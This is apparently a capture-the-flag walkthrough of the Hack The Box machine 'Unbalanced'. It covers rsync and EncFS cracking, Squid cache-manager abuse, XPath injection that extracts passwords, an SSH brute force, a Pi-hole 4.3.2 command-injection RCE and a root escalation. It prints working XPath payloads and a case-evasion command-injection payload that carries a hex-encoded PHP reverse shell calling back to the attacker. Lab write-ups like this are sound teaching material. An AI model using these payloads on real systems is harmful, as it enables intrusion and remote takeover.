Scanning
Nmap
ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.200 | grep open | awk -F / '{print $1}' ORS=',') echo $ports && nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.200
1
2
3
4
5
6
PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
+873/tcp open rsync (protocol version 31)
+3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Squid http proxy : Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.
- add this proxy in
foxyproxy
goto : http://10.10.10.200
Error : Access Denied.
- i don’t have any host that is allowed from the proxy so i can not get much information from here for now.
rsync
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files. It is commonly found on Unix-like operating systems. Rsync is written in C as a single threaded application.
rsync Enumeration
list all directories -
rsync 10.10.10.200::
1
conf_backups EncFS-encrypted configuration backups
copy
conf_backups
in local machine -rsync -av 10.10.10.200::conf_backups conf_backups
inside conf_backups directory
1 2 3 4 5 6 7
❯ tree -a conf_backups conf_backups ├── 0K72OfkNRRx3-f0Y6eQKwnjn <snippet> └── ZXUUpn9SCTerl0dinZQYwxrx 0 directories, 75 files
folder is EncFS-encrypted of system configuration files backup.
EncFS : EncFS is a Free (LGPL) FUSE-based cryptographic filesystem. It transparently encrypts files, using an arbitrary directory as storage for the encrypted files. … Files are encrypted using a volume key, which is stored either within or outside the encrypted source directory. A password is used to decrypt this key.
in EncFS encryption all file name change into random text and create
.encfs6.xml
file that contains metadata of the encryption.searching on google i find out that johntheripper has a python script that extract password hash from
.encfs6.xml
file.
cracking EncFS-encrypted conf_backups Folder
use encfs2john.py to extract hash
python3 /usr/share/john/encfs2john.py dump/conf_backups
1
dump/conf_backups:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
crack hash using john
john -w=/usr/share/wordlists/rockyou.txt encfs_hash
1 2 3 4 5 6
Using default input encoding: UTF-8 Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES]) bubblegum (conf_backups) Session completed
Found Password :
bubblegum
decrypt conf_backups require encfs tool’s encfsctl utility which decrypt encfs filesystem.
encfsctl export conf_backups encfs_decrypt
1
EncFS Password: bubblegum
1
2
3
4
5
6
7
8
9
❯ tree -a encfs_decrypt
encfs_decrypt
├── 50-localauthority.conf
<snippet>
+── squid.conf
<snippet>
└── xattr.conf
0 directories, 74 files
squid
squid-proxy
from the decrypted config files grep for htb
grep -r htb
1
squid.conf:acl intranet dstdomain -n intranet.unbalanced.htb
Internal Host : intranet.unbalanced.htb
- Host is found in
squid.conf
and then i rewind that there a Squid http proxy service running on port 873 in the box. - i already add proxy in my browser and now found a host that can accessible from the proxy.
- i can access to
intranet.unbalanced.htb
fromsquid-proxy
i set in the foxyproxy, but i don’t find anything interesting in host web page.
- i can access to
squid:CacheManager
From the decrypted config files grep for passwd
grep -r passwd
1
squid.conf:cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
found a
cachemgr_passwd
string in squid config file, reading the squid config documents i found out that there are 2 part in thecachemgr_passwd
string from this doc1
Usage: cachemgr_passwd password action action ...
- in the squid config file
cachemgr_passwd
Specify passwords for cachemgr operations. cachemgr_passwd
has tow part in it First is Password and second is action that are allowed on that passwd- in this squid config file
- First : passwd:
Thah$Sh1
- Second : actiions:
menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
- First : passwd:
- in CacheManager documentation i found a tool squidclient: A command line utility for performing web requests. It also has a special ability to send cache manager requests to Squid proxies.
User Exploit
squidclient
- from all specified actions in the config file i found some useful actions, here is a good blog on CacheManager actions.
Action : fqdncache : This is a report of the Squid DNS cache for IP address resolution. this is same as iptable.
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Sat, 21 Nov 2020 04:52:08 GMT
Content-Type: text/plain;charset=utf-8
Expires: Sat, 21 Nov 2020 04:52:08 GMT
Last-Modified: Sat, 21 Nov 2020 04:52:08 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close
FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 10
FQDNcache Requests: 19292
FQDNcache Hits: 0
FQDNcache Negative Hits: 8790
FQDNcache Misses: 10502
FQDN Cache Contents:
Address Flg TTL Cnt Hostnames
10.10.14.3 N -36278 0
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
+ 172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
+ 172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
+ 172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters
10.10.15.75 N -47928 0
Found 3 working Host IPs -
1 2 3
172.31.179.2 172.31.179.3 172.17.0.1
but these IPs goes on same place (
/intranet.php
) whereintranet.unbalanced.htb
goes that i found before.- All hosts have same login page with username and passworrd field.
- I try diffrent types of injection.
I create a simple burp intruder list of diffrent injections from PayloadAllTheThings but none of them worked on any of these hosts.
for intercepting internal Hosts request i set squid proxy
http://10.10.10.200:3128
as upstream proxy in burpSuiteeventually i try for 172.31.179.1 and this give an error -
1
Host temporarily taken out of load balancing for security maintenance.
- i tried
172.31.179.1/intranet.php
as all Hosts redirected here and i got that same login page.
- i tried
- again, i run my intruder list and this time i found a working injection in the password field.
XPATH injection 1 2
Passowrd field is vulnerable for xpath injection
XPathi Payload
1
' or '1'='1
get some employees details
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
rita Rita Fubelli rita@unbalanced.htb Role: HR Manager jim Jim Mickelson jim@unbalanced.htb Role: Web Designer bryan Bryan Angstrom bryan@unbalanced.htb Role: System Administrator sarah Sarah Goodman sarah@unbalanced.htb Role: Team Leader
after some time on brupSuite testing XPath injection i found a way to extract password strings using xpath injection like sqli.
Payload :
' or Username='bryan'and substring(Password,$i,1)='$c
i create a bruteforce script that extract password from database using XPath vulnerability. payload is worked like a sql boolean based injection. when
$i=$c
then page returnUsername
contact details, and if$i!=$c
then page returnInvalid credentials.
where i is a int and c is a char- it takes some time to extract all password form the database
creds
1
2
3
4
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah
ssh bruteforce
hydra -L usernames -P password 10.10.10.200 -t 4 ssh
1
2
3
[DATA] attacking ssh://10.10.10.200:22/
+[22][ssh] host: 10.10.10.200 login: bryan password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
ssh-creds : bryan:ireallyl0vebubblegum!!!
USER:bryan shell
ssh bryan@10.10.10.200
1
2
3
4
5
6
+bryan@10.10.10.200's password: ireallyl0vebubblegum!!!
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
bryan@unbalanced:~$ cat user.txt
f91a0994************************
Privesc enumeration
in the bryan home folder there is a
TODO
file and inside the file there is a service specified that is running on localhost -1 2 3 4 5 6 7 8
########### # Pi-hole # ########### * Install Pi-hole docker (only listening on 127.0.0.1) [DONE] * Set temporary admin password [DONE] * Create Pi-hole configuration script [IN PROGRESS] - Run Pi-hole configuration script [TODO] - Expose Pi-hole ports to the network [TODO]
Pi-hole : Pi-hole is a Linux network-level advertisement and Internet tracker blocking application which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network.
enumerating Pi-hole
check service port
1 2 3 4
bryan@unbalanced:~$ ss -lnpt | grep 127.0.0.1 LISTEN 0 128 127.0.0.1:8080 0.0.0.0:* LISTEN 0 128 127.0.0.1:5553 0.0.0.0:*
Port 5553 is not responding
Port 8080 give an error
1
[ERROR]: Unable to parse results from queryads.php: Unhandled error message (Invalid domain!)
setup ssh with tunnel
Gobuster
gobuster dir -u http://127.0.0.1:8080/ -w words -b 200
I use -b
to ignore all 200 responses. because of that server’s custom error every request give 200.
found : /admin (Status: 301)
from the
http://127.0.0.1:8080/admin/
i got Pi-hole admin panel.I also find a Pi-hole’s docker public IP that is accessible form squid-proxy -
linpeas scan -
1 2 3 4 5 6 7 8 9
[+] Networks and neighbours 10.10.10.2 dev ens160 lladdr 00:50:56:b9:16:1a REACHABLE 172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE 172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE fe80::250:56ff:feb9:161a dev ens160 lladdr 00:50:56:b9:16:1a router STALE IP address HW type Flags HW address Mask Device 10.10.10.2 0x1 0x2 00:50:56:b9:16:1a * ens160 172.31.179.1 0x1 0x2 02:42:ac:1f:b3:01 * br-742fc4eb92b1 172.31.11.3 0x1 0x2 02:42:ac:1f:0b:03 * br-742fc4eb92b1
these IPs are in the arp table
cat /proc/net/arp
-1 2 3 4
IP address HW type Flags HW address Mask Device 10.10.10.2 0x1 0x2 00:50:56:b9:16:1a * ens160 172.31.179.1 0x1 0x2 02:42:ac:1f:b3:01 * br-742fc4eb92b1 172.31.11.3 0x1 0x2 02:42:ac:1f:0b:03 * br-742fc4e
IP 172.31.179.1 is the same XPath vulnerable host
IP 172.31.11.3 is Pi-hole docker IP
Access to
172.31.11.3
from squid-proxy gives Pi-hole admin console and here i found Pi-hole version is4.3.2
1
Pi-hole Version v4.3.2 Web Interface Version v4.3 FTL Version v4.3.1
On the console i got a pi-hole hostname
1
pihole.unbalanced.htb
login with temporary password:admin - login successful
IP:127.0.0.1 and IP: 172.31.11.3 give same result because Pi-hole instance is accessible from both local and squid-proxy.
search for Pi-hole 4.3.2 vulnerability i got an exploit from ExploitDB
Exploting Pi-hole
Exploit Impact : Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.
Exploit Reason : defining MAC address while configuring DHCP leases form pi-hole is not validate the mac address properly so one can manipulate that mac address field and put reverse shell and execute it.
refer to natedotred bolg for complete exploitation process.
Goto Pi-hole Web-Console » Admin-Panel » Settings (login with Password:admin) » DHCP tab
1
http://172.31.11.3/admin/settings.php?tab=piholedhcp
legitimate MAC address format should be as follows:
1
aaaaaaaaaaaa
The MAC address input can be tampered to execute arbitrary code:
1
aaaaaaaaaaaa$PATH
configure DHCP leas with tampered MAC
1 2 3
MAC address IP address Hostname aaaaaaaaaaaa$PATH 10.10.10.200 10.10.10.200
got output like this:
1 2 3
MAC address IP address Hostname AAAAAAAAAAAA/opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 10.10.10.200 10.10.10.200
pi-hole “savesettings.php” is responsible for this vulnerability.
lines 53-57: The application first validates the MAC address format using the function preg_match().
1
2
3
4
5
function validMAC($mac_addr)
{
// Accepted input format: 00:01:02:1A:5F:FF (characters may be lower case)
return (preg_match('/([a-fA-F0-9]{2}[:]?){6}/', $mac_addr) == 1);
}
lines 542-550: then check only html special characters and converts the input to uppercase.
1
2
3
4
5
6
$mac = $_POST["AddMAC"];
if(!validMAC($mac))
{
$error .= "MAC address (".htmlspecialchars($mac).") is invalid!<br>";
}
$mac = strtoupper($mac);
lines 588-592: then adds the entry to DHCP using a pihole system command.
1
2
3
4
5
if(!strlen($error))
{
exec("sudo pihole -a addstaticdhcp ".$mac." ".$ip." ".$hostname);
$success .= "A new static address has been added";
}
Exploit exception : MAC address input convert input data in upperCase letters and if we put shellcode in it. it converts all code in upperCase, As Linux commands are case sensitive, this would fail.
the way to overcome this difficulty is to make use of environment variables and POSIX Shell Parameter Expansions.
Manual Exploit
payload Encoding
Reverse Shell Payload : aaaaaaaaaaaa&&php -r ‘$sock=fsockopen(“tun0”,4141);exec(“/bin/sh -i <&3 >&3 2>&3”);’
there are three peices in the payload
First, MAC address
aaaaaaaaaaaa
use as it is.Second, environment variables, In the encoded shell command we define the $P, $H and $R shell parameters that contain their matching lower-case character with the following POSIX Shell Parameter Expansions:
Example
1
2
3
4
5
6
❯ W=${PATH#/???/}
echo $W
bash:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
❯ P=${W%%?????:*}
echo $P
p
All variables:
1
2
3
4
5
6
W=${PATH#/???/}
P=${W%%?????:}
X=${PATH#/???/??}
H=${X%%???:}
Z=${PATH#:/??}
R=${Z%%/}
and now the payload looks life this: <MAC>&&<variables>
1
aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS
here $IFS
is a default shell delimiter character which is a space.
Third, reverse shell code 'php -r \'$sock=fsockopen("tun0",4141);exec("/bin/sh -i <&3 >&3 2>&3");\''
in hex coded form, inside the php function - ’EXEC(HEX2BIN(“<shellcode>”));’&&
I use python to encode payload into hex -
1 2 3 4 5 6 7
❯ python2 Python 2.7.18 (default, Apr 20 2020, 20:30:41) [GCC 9.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> p = 'php -r \'$sock=fsockopen("tun0",4141);exec("/bin/sh -i <&3 >&3 2>&3");\'' >>> p.encode("hex").upper() '706870202D72202724736F636B3D66736F636B6F70656E282231302E31302E31342E3437222C34313431293B6578656328222F62696E2F7368202D69203C2633203E263320323E263322293B27'
Final payload : aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("<shellcode>"));'&&
My Payload : aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("706870202D72202724736F636B3D66736F636B6F70656E282231302E31302E31342E3339222C34313431293B6578656328222F62696E2F7368202D69203C2633203E263320323E263322293B27"));'&&
Notes: Both IPs from squid-proxy 172.31.11.3
or with ssh tunnel on 127.0.0.1:8080
give a reverse shell as www-data
Root Privesc
user
www-data
is able to read/root
dir1 2 3 4 5 6 7 8
$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ cd /root $ pwd /root $ ls -la -rw-r--r-- 1 root root 113876 Sep 20 2019 ph_install.sh -rw-r--r-- 1 root root 485 Apr 6 2020 pihole_config.sh
inside
pihole_config.sh
file1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
$ cat pihole_config.sh #!/bin/bash # Add domains to whitelist /usr/local/bin/pihole -w unbalanced.htb /usr/local/bin/pihole -w rebalanced.htb # Set temperature unit to Celsius /usr/local/bin/pihole -a -c # Add local host record /usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1 # Set privacy level /usr/local/bin/pihole -a -l 4 # Set web admin interface password /usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!' # Set admin email /usr/local/bin/pihole -a email admin@unbalanced.htb
there is a Pi-hole admin password: bUbBl3gUm$43v3Ry0n3! and su using this password from bryan’s ssh shell worked and get root shell
1 2 3 4 5 6
bryan@unbalanced:~$ su - root Password: bUbBl3gUm$43v3Ry0n3! root@unbalanced:~# id uid=0(root) gid=0(root) groups=0(root) root@unbalanced:~# cat root.txt 8c97fa50************************